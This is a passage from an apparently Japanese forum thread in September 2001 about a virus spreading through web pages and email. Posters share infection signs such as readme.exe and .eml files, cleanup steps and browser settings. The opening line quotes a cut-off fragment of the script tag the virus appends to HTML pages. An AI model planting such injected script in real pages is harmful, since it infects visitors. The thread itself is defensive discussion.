"resizable=no,top=6000,left=6000")</script></html> が追加される。
949 :
! :01/09/19 23:25 ID:BYEyAkxw
950 :
名無しなのか? :01/09/19 23:25 ID:qoiB.8o2
951 :
:01/09/19 23:26 ID:UKoXFWhc
今までFW(含PFW)も導入せず、ウイルス対策もしてなかったような やつらが何を今になって慌ててるんだか・・・・
952 :
続き :01/09/19 23:26 ID:yZ87i7kI
状況報告ver1.06(後編)
感染の有無の確認
1.●トレンドマイクロ オンラインスキャン
http://www.trendmicro.co.jp/hcall/scan.htm 2.『*.eml』『readme.exe』『MEP51B3.TMP.EXE』の検索でHIT
*.emlが大量にHITした際は確定。
ただし、それが以前に自分の書いた見覚えのあるメールだったら、
それはウイルスではない。
そうでないときは後者2個を削除して様子を見る。
といっても後者二つを消したからウイルスが消えるわけではない。
ファイルのDLを拒否してもファイルが作成されたという報告
(多分一時ファイルに残っているだけだろうが)があるので、
危険ブラウザでない人もファイルのDLを不許可にした方がいい。
3.『mep』で検索した際に『mep????.tmp』がHITする(らしい)
感染時の対応
感染してしまった後は、アップデートしても無意味。
とりあえず感染を拡大しないようにウイルス対応ソフトのHP以外には行かず、ワクチンが出来るまで他のWEBコンテンツを回らない。
むしろ自他の被害の拡大を考えるならOS(又は感染以前のバックアップ)から
入れ直した方がいい。
感染前に対応ブラウザにして、DL拒否しているのにスキャンで
感染しているというときは多分『インターネット一時ファイル』
に残っているので、気になるならツール→インターネットオプション→
全般→インターネット一時ファイル→ファイルの削除
ワクチンできたよとかの情報など、追加のフォローさらに宜しく!>ALL
953 :
:01/09/19 23:29 ID:7112tIoU
>>934 今日はありがとう。
ゆっくり風呂でも入って、マターリしておくれ。
954 :
いつかの510 :01/09/19 23:30 ID:Ouhz3Z.c
955 :
:01/09/19 23:30 ID:Yk2xVFfU
次スレはセキュリティ板に立ててちょ
956 :
:01/09/19 23:37 ID:lbUDqEKw
957 :
:01/09/19 23:38 ID:VcTe.kz2
速報板にしてはこのスレあんまりもりあがってないね。
958 :
ぺ ◆lPYiMAEY :01/09/19 23:41 ID:Q.NJAFY.
>957 スレが2つあるからね
959 :
:01/09/19 23:43 ID:hZNQf5DU
960 :
:01/09/19 23:45 ID:ALUfLgrg
TBSでもやってる。
961 :
:01/09/19 23:45 ID:IcqskS1s
サイバーテロ…
962 :
:01/09/19 23:49 ID:NqqLTk9.
964 :
名無し :01/09/19 23:49 ID:7nIc7.2w
そろそろ加速?
965 :
:01/09/19 23:50 ID:y/D0.fMk
2ちゃんに引きこもるか・・・
966 :
:01/09/19 23:51 ID:ezY2nkUk
俺はもうやられたよ。 鬱だ氏脳
967 :
:01/09/19 23:51 ID:mxUXkeNs
今コンビニでワクチンソフト売ってないよね??以前はあったんだが。
968 :
名無し :01/09/19 23:52 ID:7nIc7.2w
1000はまだか?
969 :
:01/09/19 23:52 ID:nnJckqEA
IE5.5をWindowsUpdateでインストールしようとしたんですが 標準インストールじゃなければまずいでしょうか? プラウザだけでは駄目?
970 :
名無し :01/09/19 23:53 ID:7nIc7.2w
1000!
971 :
:01/09/19 23:53 ID:mxUXkeNs
しかし シマンテックもうすぐ安置ウイルス2002がでるんだが2001買いたく無い
972 :
名無し :01/09/19 23:54 ID:s6wPAmQY
見て感染は防げそうだけど 添付メールのほうは防げないの?
973 :
:01/09/19 23:54 ID:cfhptFno
readme.exeを含まれる文字列で検索したら5つあったけど、 やばいの?
974 :
い :01/09/19 23:54 ID:8uX9itlo
1000う
975 :
1000 :01/09/19 23:55 ID:FJzCY.Kw
1000
976 :
:01/09/19 23:56 ID:6VlhIkQw
977 :
:01/09/19 23:57 ID:q6umiJv.
978 :
:01/09/19 23:57 ID:80QZytcs
ブラウザで速報板を見たら、ウイルスへの警告文があった。 なんかこわー
979 :
:01/09/19 23:58 ID:qcdjllZw
よいよい
980 :
:01/09/19 23:59 ID:/pckEwmQ
/ ) / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ./ / | 1000!! / / \ / ̄ ̄ ̄ / /  ̄|/ ̄ ̄ ̄ ̄| マンセー ./Λ_Λ , -つ \ / /<丶`∀´> ./__ノ  ̄∨ ̄ ̄ ̄ ̄ / \ / / ⊂_ヽ、 .| へ/ / .\\ Λ_Λ | レ' /、二つ \ ( ´Д`) | / > ⌒ヽ / / / へ \ / / / / \\ / / レ ノ ヽ_つ / ノ / / _/ / / /| ノ / ( ( 、 ⊂ -' | |、 \ | / \ ⌒l | | ) / ノ ) し' (_/
オイラのばあい・・・トレンドマイクロでスキャンしたけど 何一つウイルスは引っかかってなかった。
982 :
:01/09/20 00:02 ID:gwKdyKJA
983 :
名無し :01/09/20 00:02 ID:y8aIBcz.
このスレ980超えても、緩やかな伸び方・・・。 最近にしては異常だ(w
984 :
:01/09/20 00:04 ID:ZfLWYKNQ
/ ) / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ./ / | 飛び出せ!! / / \ / ̄ ̄ ̄ ̄ ̄ ̄ / /  ̄|/ ̄ ̄ ̄ ̄| 1000!! ./∧_∧ , -つ \ /<丶`∀´> ./__ノ  ̄∨ ̄ ̄ ̄ ̄ / \ / / ⊂_ヽ、 .| へ/ / .\\ ∧_∧ | レ' /、二つ \ ( ´Д` ) | / > ⌒ヽ / / / へ \ / / / / \\ / / レ ノ ヽ_つ / ノ / / _/ / / /| ノ / ( ( 、 ⊂ -' | |、 \ | / \ ⌒l | | ) / ノ ) し' (_/
985 :
mm :01/09/20 00:06 ID:jBMmXOIs
1000GET
986 :
:01/09/20 00:06 ID:H.FOaltM
1000
987 :
中中 :01/09/20 00:06 ID:7O6hrMTA
JavaScriptの切り方: インターネットオプション ↓ セキュリティレベルのカスタマイズ ↓ JavaScriptの無効 ついでにJavaも無効 ダウンロードも無効 こうしておけば、簡単な対策にはなるの?
988 :
1000 :01/09/20 00:07 ID:NqmMlkh.
今ここに何人いるのだろう? なんか ドキドキしてきたYO!
989 :
マターリ :01/09/20 00:07 ID:NfM8xwi6
マターリしててイイ!
990 :
1000 :01/09/20 00:08 ID:NfM8xwi6
1000かな?
991 :
1000 :01/09/20 00:09 ID:70aubJc6
1000
992 :
mm :01/09/20 00:09 ID:jBMmXOIs
伸びがおそいぞ そろそろ1000かな
993 :
:01/09/20 00:09 ID:WfjqE8/Q
思ったより1000いくのがスローペース(w
1000!!!(w
995 :
:01/09/20 00:09 ID:wl8noRG.
| ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄| | 1000! | |_________| ∧∧ || ( ゚д゚)|| / づΦ
996 :
100 :01/09/20 00:09 ID:qRlfWngU
1000000
997 :
1 :01/09/20 00:09 ID:JgOOybW6
11
998 :
1000 :01/09/20 00:09 ID:Zoz6/0QU
999 :
FBI :01/09/20 00:10 ID:T69GCN8c
_人 ノ⌒ 丿 _/ ::( / :::::::\ ( :::::::;;;;;;;)_ \_―― ̄ ̄::::::::::\ ヤター!! \ ノ ̄ ::::::::::::::::::::::) / \( ::::::::::::::;;;;;;;;;;;;人/ / ̄――――― ̄ ̄::::::::\ ( ● \__/::●:::::::::::::) .\__::::::::::\/;;;;;;;;;;;;;;;;;;;;;;ノ
1000 :
:01/09/20 00:10 ID:H.FOaltM
ガ━━(゚Д゚;)━━ン! 1000ジャナイ!!!
1001 :
1001 :
Over 1000 Thread このスレッドは1000を超えました。 もう書けないので、新しいスレッドを立ててくださいです。。。